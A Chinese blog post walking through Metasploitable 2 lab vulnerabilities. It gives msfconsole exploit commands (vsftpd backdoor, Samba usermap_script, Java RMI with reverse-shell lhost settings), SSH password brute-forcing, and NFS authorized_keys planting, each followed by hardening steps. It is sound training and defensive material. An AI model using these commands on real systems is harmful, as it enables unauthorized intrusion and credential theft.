<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Metasploitable 2, Sheng &#39;s blog">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Metasploitable 2 | Sheng &#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Sheng &#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Sheng &#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/ms12020/ms12020.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
		color: #000000;
		fill: #fff;
		height: 64px;
		width: 64px;
	}

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/ms12020/ms12020.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/10.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Metasploitable 2</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-04-10
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Metasploitable-2"><a href="#Metasploitable-2" class="headerlink" title="Metasploitable 2"></a>Metasploitable 2</h1><blockquote>
<p>未加固前端口开放情况</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120095921374.png" alt="image-20210120095921374"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120095940587.png" alt="image-20210120095940587"></p>
<h2 id="vsftpd-2-3-4-21"><a href="#vsftpd-2-3-4-21" class="headerlink" title="vsftpd 2.3.4(21)"></a>vsftpd 2.3.4(21)</h2><h4 id="发现漏洞"><a href="#发现漏洞" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101906495.png" alt="image-20210120101906495"></p>
<h4 id="验证漏洞"><a href="#验证漏洞" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">┌──(sheng㉿sheng)-[~]
└─$ msfconsole 
msf6 > search vsftpd 234
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 172.16.107.245
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101009039.png" alt="image-20210120101009039"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101332372.png" alt="image-20210120101332372"></p>
<blockquote>
<p>获得root用户弱口令</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101535563.png" alt="image-20210120101535563"></p>
<h4 id="安全加固"><a href="#安全加固" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>通过防火墙过滤6200后门端口</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101633327.png" alt="image-20210120101633327"></p>
<blockquote>
<p>验证加固成功，该漏洞无法利用</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101729849.png" alt="image-20210120101729849"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101748984.png" alt="image-20210120101748984"></p>
<h2 id="ssh弱口令-22"><a href="#ssh弱口令-22" class="headerlink" title="ssh弱口令(22)"></a>ssh弱口令(22)</h2><h4 id="发现漏洞-1"><a href="#发现漏洞-1" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120101846407.png" alt="image-20210120101846407"></p>
<h4 id="验证漏洞-1"><a href="#验证漏洞-1" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">┌──(sheng㉿sheng)-[~]
└─$ msfconsole 
msf6 > search ssh_login
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.107.245
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file dic.txt
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120102402477.png" alt="image-20210120102402477"></p>
<h4 id="安全加固-1"><a href="#安全加固-1" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>禁止root用户远程登入（<code>vim /etc/ssh/sshd_config</code>）</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120102630134.png" alt="image-20210120102630134"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120102658839.png" alt="image-20210120102658839"></p>
<blockquote>
<p>验证无法远程登入root用户(密码未修改)</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120102823979.png" alt="image-20210120102823979"></p>
<blockquote>
<p> 修改弱口令</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120103353588.png" alt="image-20210120103353588"></p>
<h2 id="telnet弱口令-23"><a href="#telnet弱口令-23" class="headerlink" title="telnet弱口令(23)"></a>telnet弱口令(23)</h2><h4 id="发现漏洞-2"><a href="#发现漏洞-2" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120103848150.png" alt="image-20210120103848150"></p>
<h4 id="验证漏洞-2"><a href="#验证漏洞-2" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">telnet 172.16.107.245
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120103818938.png" alt="image-20210120103818938"></p>
<h4 id="安全加固-2"><a href="#安全加固-2" class="headerlink" title="安全加固"></a>安全加固</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120104011808.png" alt="image-20210120104011808"></p>
<blockquote>
<p>验证漏洞已修复</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120104044715.png" alt="image-20210120104044715"></p>
<h2 id="PHP-CGI参数注入执行漏洞-80"><a href="#PHP-CGI参数注入执行漏洞-80" class="headerlink" title="PHP CGI参数注入执行漏洞(80)"></a>PHP CGI参数注入执行漏洞(80)</h2><h4 id="发现漏洞-3"><a href="#发现漏洞-3" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120171908882.png" alt="image-20210120171908882"></p>
<h4 id="验证漏洞-3"><a href="#验证漏洞-3" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><blockquote>
<p>url最后添加<code>?-s</code>,即可看到页面的源代码</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124205259043.png" alt="image-20210124205259043"></p>
<pre class=" language-shell"><code class="language-shell">┌──(sheng㉿sheng)-[~]
└─$ msfconsole 
msf6 > search PHP_CGI
msf6 > use use exploit/multi/http/php_cgi_arg_injection
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 172.16.107.245
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120172108109.png" alt="image-20210120172108109"></p>
<h4 id="安全加固（未）"><a href="#安全加固（未）" class="headerlink" title="安全加固（未）"></a>安全加固（未）</h4><h2 id="NFS共享目录配置漏洞-111"><a href="#NFS共享目录配置漏洞-111" class="headerlink" title="NFS共享目录配置漏洞(111)"></a>NFS共享目录配置漏洞(111)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120173743841.png" alt="image-20210120173743841"></p>
<h4 id="发现漏洞-4"><a href="#发现漏洞-4" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120173710742.png" alt="image-20210120173710742"></p>
<h4 id="验证漏洞-4"><a href="#验证漏洞-4" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><blockquote>
<p>查看NFS服务是否开启</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120173826148.png" alt="image-20210120173826148"></p>
<blockquote>
<p>查看远程共享目录列表</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120173906774.png" alt="image-20210120173906774"></p>
<blockquote>
<p>生产rsa公钥</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120173945733.png" alt="image-20210120173945733"></p>
<blockquote>
<p>创建共享目录</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120194742126.png" alt="image-20210120194742126"></p>
<blockquote>
<p>将靶机共享的目录挂在到该文件夹下</p>
<p>若出现<code>mount.nfs:……</code>报错，需要<code>/etc/init.d/rpcbind start</code>来启动mount</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120194858710.png" alt="image-20210120194858710"></p>
<blockquote>
<p>将公钥追加到靶机的<code>authorized_keys</code>下</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120195245907.png" alt="image-20210120195245907"></p>
<blockquote>
<p>实现无密码远程登入</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120195548116.png" alt="image-20210120195548116"></p>
<h4 id="安全加固-3"><a href="#安全加固-3" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>不共享根目录，共享一个低权限目录，共享权限变低</p>
<p>(/etc/exports)</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120195907301.png" alt="++"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210312154052116.png" alt="image-20210312154052116"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120200101005.png" alt="image-20210120200101005"></p>
<h2 id="Samba-MS-RPC-Shell命令注入漏洞-139"><a href="#Samba-MS-RPC-Shell命令注入漏洞-139" class="headerlink" title="Samba MS-RPC Shell命令注入漏洞(139)"></a>Samba MS-RPC Shell命令注入漏洞(139)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120165159267.png"></p>
<h4 id="发现漏洞-5"><a href="#发现漏洞-5" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120165400551.png" alt="image-20210120165400551"></p>
<h4 id="验证漏洞-5"><a href="#验证漏洞-5" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">┌──(sheng㉿sheng)-[~]
└─$ msfconsole 
msf6 > search usermap_script
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set rhosts 172.16.107.245
msf6 exploit(multi/samba/usermap_script) > set lhost 172.16.107.14 
msf6 exploit(multi/samba/usermap_script) > set lport 4445
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120165544774.png" alt="image-20210120165544774"></p>
<h4 id="安全加固-4"><a href="#安全加固-4" class="headerlink" title="安全加固"></a>安全加固</h4><pre class=" language-shell"><code class="language-shell">vim /etc/samba/smb.conf
</code></pre>
<blockquote>
<p>将<code>username……</code>一行注释掉</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120165804318.png" alt="image-20210120165804318"></p>
<blockquote>
<p>重启服务</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120165955787.png" alt="image-20210120165955787"></p>
<blockquote>
<p>验证该漏洞无法利用</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120170023643.png" alt="image-20210120170023643"></p>
<h2 id="Samba-sysmlink默认配置目录遍历漏洞-445"><a href="#Samba-sysmlink默认配置目录遍历漏洞-445" class="headerlink" title="Samba sysmlink默认配置目录遍历漏洞(445)"></a>Samba sysmlink默认配置目录遍历漏洞(445)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124200239594.png" alt="image-20210124200239594"></p>
<h4 id="发现漏洞-6"><a href="#发现漏洞-6" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124195932087.png" alt="image-20210124195932087"></p>
<h4 id="验证漏洞-6"><a href="#验证漏洞-6" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124200301938.png" alt="image-20210124200301938"></p>
<blockquote>
<p>smbclient从4.11开始协议取消了nt1,使用smbv2,所以导致协议不能协商,会出现<code>protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED</code>报错</p>
</blockquote>
<p> <strong>解决方法:</strong></p>
<blockquote>
<p>如果是直接连接服务器,服务器是linux平台搭建的samba,就直接客户端访问的时候添加<code>--option=&#39;client min protocol=nt1&#39;</code></p>
<pre class=" language-shell"><code class="language-shell">smbclient //172.16.10.189/tmp --option='client min protocol=nt1'
</code></pre>
</blockquote>
<blockquote>
<p>在新窗口下执行smbclient命令打开上面生产的共享目录</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124200628807.png" alt="image-20210124200628807"></p>
<blockquote>
<p>进入rootfs目录</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201146510.png" alt="image-20210124201146510"></p>
<blockquote>
<p>列出密码文件,利用成功</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201222143.png" alt="image-20210124201222143"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201212714.png" alt="image-20210124201212714"></p>
<h4 id="安全加固-5"><a href="#安全加固-5" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>通过查看配置文件可以看到有两个共享文件夹</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201655657.png" alt="image-20210124201655657"></p>
<blockquote>
<p>分别查看两个共享目录</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201745691.png" alt="image-20210124201745691"></p>
<blockquote>
<p>查看/tmp的详细信息</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201836450.png" alt="image-20210124201836450"></p>
<blockquote>
<p>删除共享中的软链接即可</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124201945075.png" alt="image-20210124201945075"></p>
<blockquote>
<p>验证漏洞无法利用</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124202046456.png" alt="image-20210124202046456"></p>
<h2 id="Rlogin后门漏洞-512-513-514"><a href="#Rlogin后门漏洞-512-513-514" class="headerlink" title="Rlogin后门漏洞(512,513,514)"></a>Rlogin后门漏洞(512,513,514)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120112331605.png" alt="image-20210120112331605"></p>
<h4 id="发现漏洞-7"><a href="#发现漏洞-7" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120105428996.png" alt="image-20210120105428996"></p>
<h4 id="验证漏洞-7"><a href="#验证漏洞-7" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120105400982.png" alt="image-20210120105400982"></p>
<h4 id="安全加固-6"><a href="#安全加固-6" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>删除危险账户，设置可登入系统的账户密码为高难度密码</p>
</blockquote>
<h2 id="Java-RMI-SERVER命令执行漏洞-1099-48319"><a href="#Java-RMI-SERVER命令执行漏洞-1099-48319" class="headerlink" title="Java RMI SERVER命令执行漏洞(1099,48319)"></a>Java RMI SERVER命令执行漏洞(1099,48319)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120112304469.png" alt="image-20210120112304469"></p>
<h4 id="发现漏洞-8"><a href="#发现漏洞-8" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120112247006.png" alt="image-20210120112247006"></p>
<h4 id="验证漏洞-8"><a href="#验证漏洞-8" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">┌──(sheng㉿sheng)-[~/Desktop]
└─$ msfconsole 
msf6 > search java_rmi
msf6 > use auxiliary/scanner/misc/java_rmi_server
msf6 auxiliary(scanner/misc/java_rmi_server) > set rhosts 172.16.107.245
msf6 auxiliary(scanner/misc/java_rmi_server) > exploit 

[+] 172.16.107.245:1099   - 172.16.107.245:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] 172.16.107.245:1099   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/1.png" alt="1"></p>
<pre class=" language-shell"><code class="language-shell">msf6  > use exploit/multi/misc/java_rmi_server
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 172.16.107.245
rhosts => 172.16.107.245
msf6 exploit(multi/misc/java_rmi_server) > set lhost 172.16.107.14 
lhost => 172.16.107.14
msf6 exploit(multi/misc/java_rmi_server) > exploit 
......
meterpreter > 
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120112953097.png" alt="image-20210120112953097"></p>
<h4 id="安全加固-7"><a href="#安全加固-7" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>最有效的加固方法是安装补丁或者升级</p>
<p>如果在无法立即安装补丁或者升级的情况下,可以使用防火墙规则来阻止服务器被攻击</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120113148634.png" alt="image-20210120113148634"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120113217383.png" alt="image-20210120113217383"></p>
<h2 id="Ingreslock后门漏洞-1524"><a href="#Ingreslock后门漏洞-1524" class="headerlink" title="Ingreslock后门漏洞(1524)"></a>Ingreslock后门漏洞(1524)</h2><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120112319314.png" alt="image-20210120112319314"></p>
<h4 id="发现漏洞-9"><a href="#发现漏洞-9" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120145119976.png" alt="image-20210120145119976"></p>
<h4 id="验证漏洞-9"><a href="#验证漏洞-9" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120145008922.png" alt="image-20210120145008922"></p>
<h4 id="安全加固-8"><a href="#安全加固-8" class="headerlink" title="安全加固"></a>安全加固</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120145312535.png" alt="image-20210120145312535"></p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120145327599.png" alt="image-20210120145327599"></p>
<h2 id="MySQL弱口令-3306"><a href="#MySQL弱口令-3306" class="headerlink" title="MySQL弱口令(3306)"></a>MySQL弱口令(3306)</h2><h4 id="发现漏洞-10"><a href="#发现漏洞-10" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120114129835.png" alt="image-20210120114129835"></p>
<h4 id="验证漏洞-10"><a href="#验证漏洞-10" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><pre class=" language-shell"><code class="language-shell">mysql -h 172.16.107.245 -uroot -p
空密码
</code></pre>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210120114426224.png" alt="image-20210120114426224"></p>
<h4 id="安全加固-9"><a href="#安全加固-9" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>添加root强密码</p>
<p>删除其他可远程登入数据库的危险账户</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124144245892.png" alt="image-20210124144245892"></p>
<h2 id="Distcc后门漏洞-3632"><a href="#Distcc后门漏洞-3632" class="headerlink" title="Distcc后门漏洞(3632)"></a>Distcc后门漏洞(3632)</h2><h4 id="发现漏洞-11"><a href="#发现漏洞-11" class="headerlink" title="发现漏洞"></a>发现漏洞</h4><p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124154249602.png" alt="image-20210124154249602"></p>
<h4 id="验证漏洞-11"><a href="#验证漏洞-11" class="headerlink" title="验证漏洞"></a>验证漏洞</h4><p>使用<code>distcc_exec</code>模块</p>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124154527664.png" alt="image-20210124154527664"></p>
<h4 id="安全加固-10"><a href="#安全加固-10" class="headerlink" title="安全加固"></a>安全加固</h4><blockquote>
<p>使用防火墙策略</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124154809595.png" alt="image-20210124154809595"></p>
<blockquote>
<p>验证漏洞无法利用</p>
</blockquote>
<p><img src="https://gitee.com/ms12020/picture/raw/master/images/image-20210124154850996.png" alt="image-20210124154850996"></p>
